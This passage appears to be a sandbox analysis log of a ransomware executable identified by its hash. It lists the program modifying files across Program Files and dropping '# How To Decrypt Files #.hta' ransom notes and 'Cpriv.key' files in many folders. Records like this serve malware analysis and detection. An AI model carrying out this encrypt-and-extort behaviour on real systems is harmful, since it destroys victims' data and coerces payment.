de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME28.CSS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\WSS.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105496.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\INFOPATH.HXS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Biscay.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\Portal\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BABY_01.MID de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\security\US_export_policy.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\MarkupIconImagesMask.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsHomePage.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\vi.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\Notes_content-background.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-sampler.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Americana\TAB_ON.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR6B.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_close_down_BIDI.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-text.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107090.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\skin.dtd de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_box_left.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Swirl.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Synchronization Services\ADO.NET\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\lua\http\dialogs\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\VSTA\8.0 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\WB00673L.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Verve.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02862_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\TRANSLAT\ENES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD01176_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0251007.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01838_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\plugins\audio_mixer\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\EURO\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21376_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\BG_ADOBE.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL107.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.win32.x86_64.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS01639_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\en-US\js\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_winxp_blu.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\CLIPART\Publisher\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_left_disabled.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\J0115864.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightYellow\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Defender\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_kor.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.emf.ecore_2.10.1.v20140901-1043.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD00146_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0387895.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\mset7db.kic de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ko\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Cultures\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\PowerPoint.en-us\PowerPointMUI.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.commands_3.6.100.v20140528-1422.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Microsoft.NET\RedistList\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\en-US\css\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00221_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\lg\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\Help\1041\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105234.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105414.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Mozilla Firefox\uninstall\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\zu\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\reflow.api de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\VSTA\8.0\VSTARemotingServer.tlb de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS01635_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105286.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME36.CSS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_FileOffMask.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\FAX\EquityFax.Dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH01058_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\EXCEL.DEV_F_COL.HXK de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\9.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\images\glass_lrg.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01157_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PROOF\MSHY7EN.LEX de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18191_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\LightSpirit.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\button_left_over.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\SEARCH.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\Access\Part\Media.accdt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Google\Temp\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\or\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\divider-vertical.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_left_rest.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.http.jetty_3.0.200.v20131021-1843.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\PROG98.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SoftBlue\background.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\combo-hover-middle.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\SLATE\PREVIEW.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\epl-v10.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Office.en-us\SETUP.CHM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00524_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\tl\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Stationery\grid_(cm).wmf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\about.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\J0115868.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-jvm.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0252349.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\bs\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\Gadget_Star_Full.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\Locales\id.pak de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Title_Page_PAL.wmv de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01842_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\css\flyout.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr\default.jfc de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0240719.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\lt\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\button_MCELogo_mouseover.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\SpecialNavigationRight_SelectionSubpicture.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\Groove Starter Template.xsn de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-explorer.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00183_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-first-quarter.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\Locales\nl.pak de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Publisher.en-us\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\COMPASS\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0217872.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02097_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Median.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0149887.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Document Parts\1033\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\button_play.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\BLUEPRNT\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_few-showers.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0285444.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-io_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00705_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.jarprocessor.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SoftBlue\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\glow.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\timer_down.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-new.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\WindowsPowerShell\Modules\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\WATER\THMBNAIL.PNG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Notes_LOOP_BG.wmv de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18217_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Document Parts\1033\14\Built-In Building Blocks.dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\SpeechEngines\Microsoft\TTS20\en-US\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_divider_right.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\circle_glass_Thumbnail.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105240.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-actions_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\en-US\css\picturePuzzle.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.update\platform.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\RESUME.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-fallback_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107188.WMF 